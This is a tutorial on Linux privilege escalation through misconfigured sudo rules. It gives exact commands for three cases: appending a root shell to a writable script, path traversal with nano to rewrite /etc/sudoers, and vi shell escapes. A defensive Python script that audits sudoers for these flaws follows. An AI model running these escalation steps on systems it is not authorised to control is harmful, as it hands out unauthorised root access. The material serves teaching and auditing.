Explains how insecure configurations enable privilege escalation and demonstrates proper mitigation awareness.
# Linux Privilege Escalation Techniques
The following scenarios demonstrate common privilege escalation vectors caused by misconfigured sudo permissions.
---
## Scenario 1: Privilege Escalation Using an Executable .sh File
If a user is allowed to run a script as root without a password, such as:
```
analyst ALL=(ALL) NOPASSWD: /path/to/test.sh
```
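then the script will execute with full root privileges when run through sudo. The steps below also depend on the user being able to write to the script. That write access is the actual misconfiguration: only root should be able to modify a file that sudo runs as root.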
### Steps
1. View the script:
```
cat /path/to/test.sh
```
2. Append a command to spawn a root shell:
```
echo "/bin/bash -i" >> /path/to/test.sh
```
3. Execute the script as root:
```
sudo /path/to/test.sh
```
### Result
The user obtains a root shell because the script runs under root’s context.
---
## Scenario 2: Privilege Escalation Using Restricted nano Access
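If sudoers allows nano execution as root but restricts it to files in a specific directory, for example:
```
analyst ALL=(ALL) NOPASSWD: /usr/bin/nano /var/opt/*
```
directory traversal can be used to bypass the restriction, because the `*` in a sudoers argument pattern also matches `/`, so a path containing `..` components still satisfies the rule.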
### Steps
1. Access sudoers through a traversal path:
```
sudo nano /var/opt/../../etc/sudoers
```
2. Add full privileges for the user:
```
analyst ALL=(ALL) NOPASSWD:ALL
```
3. Save the file and escalate:
```
sudo -i
```
### Result
The user gains full root privileges via sudo.
---
## Scenario 3: Privilege Escalation Using Vim
If the user can run Vim as root:
```
analyst ALL=(ALL) NOPASSWD: /usr/bin/vi
```
Vim’s built-in shell escape provides immediate privilege escalation.
### Steps
1. Launch Vim as root:
```
sudo vi file.sh
```
2. Enter command mode and spawn a shell:
```
:!bash
```
Or use Vim’s command flag:
```
sudo vi -c '!bash'
```
### Result
Vim opens a root shell because the shell command executes under root’s privileges.
---
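Added example (not part of the original page): a sudoers audit that flags the three misconfigurations above, namely a sudo target that non-root users can modify, an editor that can run a shell or write arbitrary files, and a wildcard in the argument pattern. The finding labels, the short `ESCAPE_CAPABLE` list and the sample rules are assumptions made for this example.

```python
import os
import re
import stat

# Editors from the scenarios above (assumed short list, not exhaustive).
ESCAPE_CAPABLE = {"vi", "vim", "nano"}

# "user host = (runas) commands"; Defaults and *_Alias lines are skipped.
RULE = re.compile(
    r"^\s*(?!Defaults|\w+_Alias)(?P<user>[^\s#]+)\s+\S+\s*=\s*"
    r"(?:\([^)]*\)\s*)?(?P<cmds>.+)$"
)
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...


def writable_by_non_root(path):
    """True if the file exists and is not root-owned, or is group/world-writable."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_rule(line):
    """Return (user, command, finding) tuples for one sudoers user specification."""
    m = RULE.match(line)
    if not m:
        return []
    findings = []
    for cmd in m["cmds"].split(","):
        cmd = TAGS.sub("", cmd.strip())
        path, _, args = cmd.partition(" ")
        if cmd == "ALL":  # scenario 2's end state: no restriction at all
            findings.append((m["user"], cmd, "unrestricted"))
        if os.path.basename(path) in ESCAPE_CAPABLE:  # scenarios 2 and 3
            findings.append((m["user"], cmd, "editor-escape"))
        if "*" in args or "?" in args:  # wildcards match "/" and ".." (scenario 2)
            findings.append((m["user"], cmd, "arg-wildcard"))
        if writable_by_non_root(path):  # scenario 1
            findings.append((m["user"], cmd, "writable-target"))
    return findings


if __name__ == "__main__":
    # Constructed rules modelled on the three scenarios.
    for rule in ("analyst ALL=(ALL) NOPASSWD: /path/to/test.sh",
                 "analyst ALL=(ALL) NOPASSWD: /usr/bin/nano /var/opt/*, /usr/bin/vi"):
        print(rule, "->", [f[1:] for f in audit_rule(rule)])
```

Feed it each line of `/etc/sudoers` and of the files under `/etc/sudoers.d/`; it does not expand aliases or follow include directives.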